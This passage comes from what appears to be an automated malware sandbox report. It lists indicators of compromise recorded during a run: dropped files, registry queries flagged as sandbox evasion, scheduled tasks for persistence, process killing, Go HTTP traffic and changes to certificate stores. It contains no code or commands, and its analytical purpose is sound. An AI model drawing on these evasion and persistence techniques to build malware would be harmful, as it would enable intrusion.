(x86)\Silent-Rain\winamp.exe 7za.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-JJ5BE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-5LSFE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-CVUKV.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\is-8HVNF.tmp chashepro3.tmp File created C:\Program Files (x86)\Silent-Rain\winamp.exe 7za.exe File opened for modification C:\Program Files (x86)\Silent-Rain\help.txt app.exe File created C:\Program Files (x86)\Silent-Rain\7za.exe app.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File created C:\Windows\inf\oem2.inf Conhost.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Debug\ESE.TXT chrome.exe File opened for modification C:\Windows\INF\setupapi.dev.log Conhost.exe File opened for modification C:\Windows\inf\oem2.inf Conhost.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
pid pid_target Process procid_target 5908 3444 WerFault.exe 148 6068 3444 WerFault.exe 148 5380 3444 WerFault.exe 148 5276 3444 WerFault.exe 148 4820 3444 WerFault.exe 148 5984 3444 WerFault.exe 148 5312 3444 WerFault.exe 148 5596 3444 WerFault.exe 148 6120 3444 WerFault.exe 148 5504 3444 WerFault.exe 148 676 1332 WerFault.exe 160 7980 7268 WerFault.exe 441 1364 7268 WerFault.exe 441 7744 7268 WerFault.exe 441 4936 7268 WerFault.exe 441 6692 7268 WerFault.exe 441 7020 7268 WerFault.exe 441 8572 7268 WerFault.exe 441 8744 7268 WerFault.exe 441 8944 7268 WerFault.exe 441 9100 7268 WerFault.exe 441 6292 5348 WerFault.exe 523 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 E93D.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString E93D.tmp.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6112 schtasks.exe 3844 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 6216 timeout.exe 4272 timeout.exe 8200 timeout.exe 13228 timeout.exe 11460 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
GoLang User-Agent 12 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 26393 Go-http-client/1.1 HTTP User-Agent header 26472 Go-http-client/1.1 HTTP User-Agent header 33134 Go-http-client/1.1 HTTP User-Agent header 777 Go-http-client/1.1 HTTP User-Agent header 796 Go-http-client/1.1 HTTP User-Agent header 791 Go-http-client/1.1 HTTP User-Agent header 961 Go-http-client/1.1 HTTP User-Agent header 1170 Go-http-client/1.1 HTTP User-Agent header 26442 Go-http-client/1.1 HTTP User-Agent header 26481 Go-http-client/1.1 HTTP User-Agent header 771 Go-http-client/1.1 HTTP User-Agent header 779 Go-http-client/1.1 -
Kills process with taskkill 21 IoCs
pid Process 6556 TASKKILL.exe 14976 taskkill.exe 11964 taskkill.exe 7448 taskkill.exe 8352 taskkill.exe 6740 taskkill.exe 13700 taskkill.exe 5368 taskkill.exe 6940 taskkill.exe 14580 taskkill.exe 13652 taskkill.exe 14632 taskkill.exe 9332 taskkill.exe 13064 taskkill.exe 3512 taskkill.exe 3908 taskkill.exe 7096 taskkill.exe 3568 taskkill.exe 8816 taskkill.exe 12436 taskkill.exe 12580 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main cmd.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs Conhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My Conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Conhost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" windefender.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 windefender.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet 